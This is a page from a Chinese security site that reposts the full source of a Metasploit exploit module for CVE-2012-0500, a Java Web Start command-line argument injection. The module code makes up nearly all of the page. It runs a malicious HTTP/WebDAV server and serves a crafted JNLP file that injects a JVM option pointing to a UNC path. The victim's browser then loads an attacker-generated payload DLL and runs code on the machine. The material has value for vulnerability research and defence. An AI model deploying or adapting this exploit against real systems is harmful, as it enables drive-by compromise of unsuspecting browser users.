首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sun Java Web Start Plugin Command Line Argument Injection (2012)
来源:http://www.metasploit.com 作者:jduck 发布时间:2012-02-25  
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
 #
 # This module acts as an HTTP server
 #
 include Msf::Exploit::Remote::HttpServer::HTML
 include Msf::Exploit::EXE
 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Sun Java Web Start Plugin Command Line Argument Injection (2012)',
   'Description'    => %q{
     This module exploits a flaw in the Web Start component of the Sun Java
    Runtime Environment. The arguments passed to Java Web Start are not properly
    validated, allowing injection of arbitrary arguments to the JVM.
    By utilizing the lesser known -J option, an attacker can take advantage of
    the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method
    allows an attacker to execute arbitrary code in the context of an unsuspecting
    browser user.
    In order for this module to work, it must be ran as root on a server that
    does not serve SMB. Additionally, the target host must have the WebClient
    service (WebDAV Mini-Redirector) enabled.
   },
   'License'        => MSF_LICENSE,
   'Author'         => 'jduck', # Bug reported to Oracle by TELUS
   'Version'        => '$Revision$',
   'References'     =>
    [
     [ 'CVE', '2012-0500' ],
     [ 'OSVDB', '79227' ],
     [ 'BID', '52015' ],
     [ 'URL', 'http://seclists.org/fulldisclosure/2012/Feb/251' ],
     [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html' ]
    ],
   'Platform'       => 'win',
   'Payload'        =>
    {
     'Space'    => 1024,
     'BadChars' => '',
     'DisableNops' => true,
     'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
    },
   'Targets'        =>
    [
     [ 'Automatic', { } ],
     [ 'Java Runtime on Windows x86',
      {
       'Platform' => 'win',
       'Arch' => ARCH_X86
      }
     ],
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'Feb 14 2012'
   ))
  register_options(
   [
    OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
    OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
    OptString.new('UNCPATH', [ false, 'Override the UNC path to use. (Use with an SMB server)' ])
   ], self.class)
 end
 def auto_target(cli, request)
  agent = request.headers['User-Agent']
  ret = nil
  #print_status("Agent: #{agent}")
  # Check for MSIE and/or WebDAV redirector requests
  if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/
   ret = targets[1]
  elsif agent =~ /MSIE (6|7|8)\.0/
   ret = targets[1]
  else
   print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
  end
  ret
 end
 def on_request_uri(cli, request)
  # For this exploit, this does little besides ensures the user agent is a recognized one..
  mytarget = target
  if target.name == 'Automatic'
   mytarget = auto_target(cli, request)
   if (not mytarget)
    send_not_found(cli)
    return
   end
  end
  # Special case to process OPTIONS for /
  if (request.method == 'OPTIONS' and request.uri == '/')
   process_options(cli, request, mytarget)
   return
  end
  # Discard requests for ico files
  if (request.uri =~ /\.ico$/i)
   send_not_found(cli)
   return
  end
  # If there is no subdirectory in the request, we need to redirect.
  if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//)
   if (request.uri == '/')
    subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
   else
    subdir = request.uri + '/'
   end
   print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")
   send_redirect(cli, subdir)
   return
  else
   share_name = $1
  end
  # dispatch WebDAV requests based on method first
  case request.method
  when 'OPTIONS'
   process_options(cli, request, mytarget)
  when 'PROPFIND'
   process_propfind(cli, request, mytarget)
  when 'GET'
   process_get(cli, request, mytarget, share_name)
  when 'PUT'
   print_status("Sending 404 for PUT #{request.uri} ...")
   send_not_found(cli)
  else
   print_error("Unexpected request method encountered: #{request.method}")
  end
 end
 #
 # GET requests
 #
 def process_get(cli, request, target, share_name)
  print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
  # dispatch based on extension
  if (request.uri =~ /\.dll$/i)
   #
   # DLL requests sent by IE and the WebDav Mini-Redirector
   #
   print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")
   # Re-generate the payload
   return if ((p = regenerate_payload(cli)) == nil)
   # Generate a DLL based on the payload
   dll_data = generate_payload_dll({ :code => p.encoded })
   # Send it :)
   send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })
  elsif (request.uri =~ /\.jnlp$/i)
   #
   # Send the jnlp document
   #
   # Prepare the UNC path...
   if (datastore['UNCPATH'])
    unc = datastore['UNCPATH'].dup
   else
    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    unc = "\\\\" + my_host + "\\" + share_name
   end
   # NOTE: we ensure there's only a single backslash here since it will get escaped
   if unc[0,2] == "\\\\"
    unc.slice!(0, 1)
   end
   http_agent = Rex::Text.rand_text_alpha(8+rand(8))
   jnlp_data = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<jnlp version="1">
<information>
   <title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
   <vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
   <description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
</information>
<resources>
   <java version="1.3+" initial-heap-size='512m" -J-XXaltjvm=#{unc} "' />
</resources>
<resources><java java-vm-args='-Dhttp.agent=#{http_agent}"' /></resources>
</jnlp>
EOS
   print_status("Sending JNLP to #{cli.peerhost}:#{cli.peerport}...")
   send_response(cli, jnlp_data, { 'Content-Type' => 'application/x-java-jnlp-file' })
  else
   print_status("Sending redirect to the JNLP file to #{cli.peerhost}:#{cli.peerport}")
   jnlp_name = Rex::Text.rand_text_alpha(8 + rand(8))
   jnlp_path = get_resource()
   if jnlp_path[-1,1] != '/'
    jnlp_path << '/'
   end
   jnlp_path << request.uri.split('/')[-1] << '/'
   jnlp_path << jnlp_name << ".jnlp"
   send_redirect(cli, jnlp_path, '')
  end
 end
 #
 # OPTIONS requests sent by the WebDav Mini-Redirector
 #
 def process_options(cli, request, target)
  print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
  headers = {
   #'DASL'   => '<DAV:sql>',
   #'DAV'    => '1, 2',
   'Allow'  => 'OPTIONS, GET, PROPFIND',
   'Public' => 'OPTIONS, GET, PROPFIND'
  }
  send_response(cli, '', headers)
 end
 #
 # PROPFIND requests sent by the WebDav Mini-Redirector
 #
 def process_propfind(cli, request, target)
  path = request.uri
  print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
  body = ''
  if (path =~ /\.dll$/i)
   # Response for the DLL
   print_status("Sending DLL multistatus for #{path} ...")
#<lp1:getcontentlength>45056</lp1:getcontentlength>
   body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag>
<lp2:executable>F</lp2:executable>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
  elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
   # Response for anything else (generally just /)
   print_status("Sending directory multistatus for #{path} ...")
   body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
  else
   print_status("Sending 404 for #{path} ...")
   send_not_found(cli)
   return
  end
  # send the response
  resp = create_response(207, "Multi-Status")
  resp.body = body
  resp['Content-Type'] = 'text/xml'
  cli.send_response(resp)
 end
 #
 # Make sure we're on the right port/path to support WebDAV
 #
 def exploit
  if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
   raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
  end
  super
 end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Data Protector 6.1 EXEC_CMD
·cPassMan v1.82 Remote Command
·Tiny HTTP Server <=v1.1.9 Remo
·The Uploader 2.0.4 (Eng/Ita) R
·CreateVision CMS Database inje
·Orbit Downloader URL Unicode C
·TrendMicro Control Manger <= v
·Mercurycom MR804 Router Denial
·DAMN Hash Calculator v1.5.1 Lo
·linux/x86 BackShell-TCP bash[/
·Core FTP Server 1.2 Build 422
·DJ Studio Pro 5.1.6.5.2 SEH Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved